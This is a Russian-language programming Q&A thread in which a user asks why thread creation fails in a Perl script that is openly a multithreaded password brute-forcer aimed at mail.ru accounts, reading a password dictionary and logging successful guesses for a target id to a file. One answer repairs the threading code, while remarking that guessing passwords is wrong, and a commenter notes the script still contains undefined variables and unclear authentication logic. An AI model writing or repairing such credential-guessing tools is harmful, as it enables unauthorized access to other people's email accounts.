# Ошибка при создании потока

Tags: perl

1. Выдает ошибку при создании потока в этих строках

   ```
   for (0..$threads) {
       $trl[@threads] = threads->create(&Brut, $trl);
   } 
   for ($trl) {
     @threads->join();
   }
   ```

[image: результат компиляции]

```
#!/usr/bin/perl

use IO::Socket; 
use MD5; 
use LWP::UserAgent;
use threads; 
use threads::shared; 
my @pass : shared; 
my @threads;
my $trl;
$server = "www.mail.ru";


$dic = 'pass.txt'; #словарь паролей 
$id = 111111; #id цели 
$mail = 'mail%40mail.com'; #мыло, вместо @ вписать %40 
$threads = 4; #количество потоков 


open (pass, "<$dic"); 

Next: 
@pass = pass(); 

for (0..$threads) {$trl[@threads] = threads->create(&Brut, $trl);} 
for ($trl) { @threads->join(); } 

sub Brut 
{ 

while (@pass){ 

$pass = shift @pass; 

$md5 = MD5->hexhash($pass); 
$sock = IO::Socket::INET->new(Proto=>'tcp',PeerAddr=>'mail.ru',PeerPort =>80);  
print $sock "GET $dir HTTP/1.1\n"; 
print $sock "Host: $server\n"; 
print $sock "Accept: */*\n";    
print $sock "Referer: http://support.microsoft.com/\n"; 
print $sock "User-Agent: Internet Explorer 6.0\n"; 
print $sock "Pragma: no-cache\n"; 
print $sock "Cache-Control: no-cache\n"; 
print $sock "Authorization: Basic $auth\n"; 
print $sock "Connection: close\n\n";
$ans = <$sock>; 
close $sock; 
print "$pass $answ"; 
if ($ans =~ /302/){ 
open (good, '>>good.txt'); 
print good "$id:$pass:$md5\n"; 
print "$id:$pass:$md5\n"; 
close good; 
exit;} 
} 

} 

goto Next; 

sub pass 
{ 
my (@mas); 
while (<pass>){ 
push @mas, $_; 
last if (@mas == 400); 
} 
chomp @mas; 
return @mas; 
}
```

Как исправить ошибку?

Comment: Юноша, "pusy" пишется с двумя "s"

Answer (score 1):

```
for (0..$threads) {
    push @threads, threads->create(\&Brut);
} 
$_->join for @threads;
```

пароли подбирать - не хорошо.

Comment: Теперь пароли перебирает, но не выводит нужный мне 
http://upload.akusherstvo.ru/image862792.png

Comment: @Marty, в твоём вопросе один недостаток - даже на беглый взгляд код полон синтаксических (переменные $auth, $ans, $answ) и смысловых ошибок (что за авторизация и на какой адрес, куда подставляется логин, куда пароль - не ясно). в твоём комментарии два недостатка - исходя из первого утверждения не ясно что за код у тебя внезапно заработал(1) и какой ответ ты ожидаешь на свой комментарий при имеющихся вводных(2). приведи в порядок код, создай новый вопрос и всё последовательно объясни.